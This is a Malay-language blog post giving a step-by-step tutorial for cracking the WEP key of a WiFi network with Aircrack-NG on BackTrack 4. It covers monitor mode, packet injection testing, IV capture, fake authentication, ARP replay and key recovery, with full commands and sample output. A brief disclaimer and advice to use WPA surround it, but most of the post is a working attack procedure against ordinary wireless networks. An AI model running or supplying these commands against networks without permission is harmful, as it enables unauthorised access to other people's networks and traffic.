INFO DARI: http://www.huzaifah.org
JANGAN MENGGODAM TANPA KEBENARAN EMPUNYA RANGKAIAN. KERANA IANYA MENYALAHI UNDANG-UNDANG SIBER! HIJRAH HUZAIFAH TIDAK AKAN BERTANGGUNGJAWAB ATAS APA-APA AKIBAT DARI PENGGUNAAN TUTORIAL INI. TUTORIAL INI ADALAH SEKADAR UNTUK PERKONGSIAN ILMU SEMATA-MATA DAN ALAT YANG DIGUNAKAN BERTUJUAN TIDAK LAIN HANYALAH DEMI MENGUJI KEBERKESANAN SISTEM PERTAHANAN WIFI SESUATU RANGKAIAN.
Penggunaan Aircrack-NG adalah sangat mudah lebih lagi sekiranya kamu tahu menggunakan Linux dan sebarang sistem operasi berasaskan UNIX. Aku akan kongsikan cara-cara untuk menggodam ke WiFi yang menggunakan WEP kerana ianya lebih mudah dan pantas walaupun kini orang sudah jarang menggunakannya memandangkan WPA/WPA2 encryption adalah lebih kuat pertahanannya dan sangat susah untuk digodam. Mudahnya, jika kamu mempunyai sebarang rangkaian WiFi, sila guna WPA sebagai security encryption kerana kamu akan sedar betapa rapuhnya WEP itu selepas membaca tutorial ini. Dengan tujuh langkah mudah, WEP berjaya digodam.
Langkah 1 - Dapatkan Aircrack-NG
Dapatkan BackTrack 4 dan gunakan UNetbootin untuk membuat LiveUSB. Gunakan pendrive USB bersaiz 4GB dan boot melalui pendrive USB tersebut. Boleh juga BackTrack 4 tersebut diburn ke dalam DVD dan sama juga, sila boot menggunakan DVD tersebut.
Langkah 2 - Hidupkan WiFi dalam Monitor Mode
Run Konsole, dan pastikan kad WiFi anda berfungsi dengan menggunakan arahan ini.
iwconfig
Pastikan terdapat WiFi adapter anda di situ. Selalunya akan bernama wlan0.
Kemudian, gunakan arahan ifconfig wlan0 up untuk membangunkan WiFi anda dan pastikan ianya telah bangun dari tidur dengan menggunakan arahan ifconfig.
Guna arahan ini untuk meletakkan wlan0 kepada monitor mode.
airmon-ng start wlan0
Sistem akan membalas seperti berikut :
Interface Chipset Driver wlan0 Atheros madwifi-ng mon0 Atheros madwifi-ng VAP (parent: wlan0) (monitor mode enabled)
Langkah 3 - Uji Packet Injection
Ini adalah untuk memastikan anda berada dalam jarak yang cukup hampir dengan Access Point (AP) yang hendak digodam dan kebolehan kad WiFi anda untuk membuat Packet Injection.
aireplay-ng -9 -e huzaifahNet mon0
Di mana
- -9 bermaksud injection test
- -e huzaifahNet ialah nama jaringan wireless (SSID) tersebut.
- mon0 ialah interface WiFi kad kita yang telah ditukar kepada monitor mode.
Anda akan mendapat respon berikut :
09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 09:23:35 Trying broadcast probe requests... 09:23:35 Injection is working! 09:23:37 Found 1 AP 09:23:37 Trying directed probe requests... 09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'huzaifahNet' 09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 09:23:39 30/30: 100%
Pastikan output terakhir cukup tinggi dan sekiranya 0%, anda mungkin terlalu jauh dari AP tersebut ataupun kad WiFI anda tidak boleh digunakan untuk packet injection. Rujuk laman web Aircrack-NG untuk maklumat lanjut
Langkah 4 - Guna Airodump-NG untuk dapatkan IVs
Buka Konsole yang lain dan taip arahan di bawah.
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0
Di mana :
- -c 9 ialah channel AP tersebut.
- -
-bssid 00:14:6C:7E:40:80 ialah alamat MAC untuk AP tersebut.
- -w capture ialah nama file untuk IVs yang dipancing.
- mon0 ialah nama interface seperti sedia maklum.
Ouput packet injection adalah seperti berikut:
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP huzaifahNet BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
Langkah 5 - Buat Authentication Palsu Menggunakan aireplay-ng
aireplay-ng -1 0 -e huzaifahNet -h 00:0F:B5:88:AC:82 mon0
Di mana:
- -1 bermaksud authentication palsu
- 0 masa reassociation dalam saat
- -e huzaifahNet nama wireless.
- -h 00:0F:B5:88:AC:82 ialah MAC address kita
- mon0 interface kad
Sekiranya berjaya,
18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-)
Langkah 6 - Guna aireplay-ng dalam ARP request mode
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
Sekiranya berjaya (pastikan terdapat user lain berhubung dengan AP tersbut),
Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Langkah 7 - Guna aircrack-ng untuk dapatkan WEP key
aircrack-ng -e huzaifahNet output*.cap
Sekiranya berjaya,
Aircrack-ng 0.9 [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
Perhatian :
Tutorial ini mengambil pendekatan paling mudah dan sekiranya terdapat sebarang kemusykilan, sila rujuk laman web aircrack-ng.
Wallahu'alam.
*jika anda mencuba, itu adalah tanggungjawab anda sendiri..*
No comments:
Post a Comment